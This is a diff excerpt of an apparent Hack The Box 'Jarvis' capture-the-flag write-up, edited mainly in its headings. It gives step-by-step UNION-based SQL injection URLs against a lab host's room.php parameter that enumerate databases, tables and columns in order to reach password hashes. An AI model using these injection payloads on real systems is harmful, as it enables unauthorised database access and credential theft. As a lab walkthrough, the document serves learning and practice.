h4md153v63n/CTFs/01_HTB/26_Jarvis.md

 + Database is MariaDB 10.1.48.
 Next, tyr to print out the list of password hashes step by step.

-+ **List DBs:** List DBs using **group_concat()** which puts all the values from different rows into one string, and concats multiple rows of the same table with one query.
++ **Enumerate DBs:** **List DBs** using **group_concat()** which puts all the values from different rows into one string, and concats multiple rows of the same table with one query.
 Otherwise, you get nothing because of querying more than one column in the sub select query.
 In order to output multiple columns, you can use the group_concat() function.
 ```
 http://10.10.10.143/room.php?cod=55+union+select+1,2,group_concat(schema_name),4,5,6,7+from+information_schema.schemata;-- -
 ```

 ![image](https://github.com/h4md153v63n/CTFs/assets/5091265/505dc514-807d-4b4f-917b-2c6481afb3a5)

-+ **Show Tables in hotel:** To list the tables in the hotel DB:
++ **Enumerate tables in specific DB:** List the tables in the hotel DB since the only non-standard DB is hotel.
 ```
 http://10.10.10.143/room.php?cod=55+union+select+1,2,group_concat(table_name),4,5,6,7+from information_schema.tables+where+table_schema='hotel';-- -
 ```

 ![image](https://github.com/h4md153v63n/CTFs/assets/5091265/221d44c9-2037-47dc-9f76-ce5706a659e0)

-+ **Show Columns in room:** Enumerate columns in table room:
++ **Enumerate columns in specific table:** Show columns in table room:
 ```
 http://10.10.10.143/room.php?cod=55+union+select+1,2,group_concat(column_name),4,5,6,7+from+information_schema.columns+where+table_name='room';-- -
 ```

 ![image](https://github.com/h4md153v63n/CTFs/assets/5091265/18e3b52f-57d8-474e-ad0c-3d15c5ef9bfd)

-+ **Show Tables in mysql:** There are no any usernames or creds in this DB.
++ **Show Tables in mysql default db:** There are no any usernames or creds in this DB.
 Control the default mysql DB, and see a lot of tables.
 ```
 http://10.10.10.143/room.php?cod=55+union+select+1,2,group_concat(table_name),4,5,6,7+from information_schema.tables+where+table_schema='mysql';-- -
 ```